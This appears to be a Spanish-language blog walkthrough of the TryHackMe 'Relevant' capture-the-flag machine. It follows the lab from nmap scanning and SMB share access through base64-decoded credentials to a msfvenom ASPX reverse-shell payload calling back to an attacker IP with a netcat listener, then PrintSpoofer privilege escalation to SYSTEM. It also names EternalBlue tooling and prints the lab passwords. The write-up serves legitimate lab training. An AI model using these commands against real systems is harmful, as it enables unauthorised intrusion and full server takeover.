Relevant (THM) Walkthrough.

-

 

Relevant (THM)





Relevant - Penetration Test

Datos preliminares del cliente

  • IP: 10.10.187.201

Fase de reconocimiento

Se realiza un escaneo completo con nmap, para ver los puertos de la maquina abiertos.


Y nos arroja este resultado de puertos abiertos:

Ahora que ya tenemos una lista de los puertos, veremos las versiones y lanzaremos unos Scripts de reconocimiento.


Que nos lanza los siguientes resultados:



observamos un servicio http por el puerto 80, un servicio smb en el 445, y otro http por el 49663.

Empezaremos viendo estos dos.

Explotación

El puerto 80 en principio no aporta nada, solo un servicio de IIS.


Vemos que en el 445 hay un recurso compartido:

miramos que hay dentro de dicho recurso y nos lo descargamos a nuestra maquina.

Y observamos dos credenciales en-codeadas en base64, las desencodeamos a texto plano y descubrimos las siguientes credenciales:

Tenemos a Bob con password !P@$$W0rD!123 y a Bill con Juw4nnaM4n420696969!$$$

Estas credenciales no funcionan en RDP ni para ejecutar comandos de forma remota con psexec.py

Vamos hora con gobuster a probar de encontrar directorios en los puertos 80 y 49663.

En el puerto 80, no encontramos nada, probamos un escaneo con el 49663.



Y mientras se escanea seguimos reconociendo los puertos 445 con nmap y descubrimos esta vulnerabilidad:


Vemos que es vulnerable a ms17-010 de Eternal Blue. Podemos explotar la maquina con AutoBlue, cuyo script lo podemos bajar de github https://github.com/3ndG4me/AutoBlue-MS17-010 usando el comando git clone, o usando Metasploit y utilizar Eternalblue.

Aunque esto nos aleja de la explotación normal de la maquina aunque ya tendríamos un vector de entrada.

El escáner por gobuster, nos dio la ruta siguiente:

http://10.10.84.69:49663/nt4wrksv/

Que al entrar en ella no vemos nada, si miramos si podemos ver el archivo passwords del smb veremos que si se puede ver el contenido.


Entonces visto que desde el servidor web podemos leer archivos, probaremos a subir un archivo de prueba a ver si podemos obtener acceso a la maquina.

Creamos un exploit con msfvenom en formato aspx:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.117.16 LPORT=443 -f aspx > relevant.aspx

Una vez creado lo subimos con put al cliente smb.


Nos ponemos a la escucha con “nc -nvlp 443” y lo buscamos en el navegador:

http://10.10.84.69:49663/nt4wrksv/relevant.aspx

y ya tendremos acceso a la maquina victima, luego navegamos hasta es escritorio del usuario Bob y tendremos la primera flag.



Escalada de privilegios


A continuación escalamos los privilegios que tenemos como usuario.


descubrimos que SeImpersonatePrivilege está habilitado para nuestro usuario actual, lo que significa que podemos abusar de esto para obtener autoridad total en el servidor.

Buscamos en Google como podemos explotar dicho privilegio.

Y damos con un repositorio en Github donde podemos descargarnos el exploit PrintSpoofer.

https://github.com/dievus/printspoofer

Nos lo descargamos en nuestra maquina local y lo subimos por smb para poderlo utilizar, con put y luego en nuestra shell nos dirigiremos a la ruta: “c:\inetpub\wwwroot\nt4wrksv>” donde ejecutaremos el exploit para escalar privilegios.


Y ya estaríamos como nt authority\system. Solo hay que ir a la Escritorio de Administrator y veremos la ultima flag, dando la maquina por concluida.






Comentarios

Publicar un comentario